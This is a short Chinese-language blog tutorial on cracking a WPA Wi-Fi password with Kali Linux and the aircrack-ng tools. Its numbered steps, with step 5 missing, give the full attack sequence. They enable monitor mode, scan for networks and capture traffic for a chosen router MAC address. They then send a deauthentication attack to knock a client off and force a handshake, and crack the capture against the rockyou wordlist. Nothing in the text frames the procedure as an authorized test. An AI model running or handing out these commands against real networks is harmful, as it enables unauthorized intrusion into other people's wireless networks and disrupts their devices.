-
1.注:首先需要无线网卡一张。
-
2.检查无线网卡名称。
airmon-ng
(这里,我的无线网卡名称是wlan1) -
3.开启外接无线网卡(可能会出现SIOCSIFFLAGS:Operation not possible due to RFkill错误,只要输入
rfkill unlock all
解锁所有被关闭的设备就行了。)
airmon-ng start wlan1
-
4.定位附近可用无线网络,找到目标网络后按ctrl+c便可停止。
airodump-ng wlan1mon
(启动wlan1 后,设备名称就变成了wlan1mon) -
6.捕获数据包(指定无线路由器MAC地址,数据包名称为abc)
airodump-ng -c 1 -w abc --bssid A0:57:E3:94:CA:2A wlan1mon
-
7.对路由器进行Deauth攻击(需要另开一个窗口,这里,A0:57:E3:94:CA:2A为路由器MAC地址,7C:2A:31:4F:33:91为相连设备MAC地址,等到抓包窗口有WPA handshake: A0:57:E3:94:CA:2A提示时Ctrl+c关闭停止抓包)
aireplay-ng --deauth 1 -a A0:57:E3:94:CA:2A -c 7C:2A:31:4F:33:91 wlan1mon
-
8.利用kali自带密码字典破解无线网密码(如果想要破解更复杂密码,需要更好的密码字典)
aircrack-ng -w /usr/share/wordlists/rockyou.txt abc-01.cap
kali Linux破解无线网密码
最新推荐文章于 2023-07-06 14:05:33 发布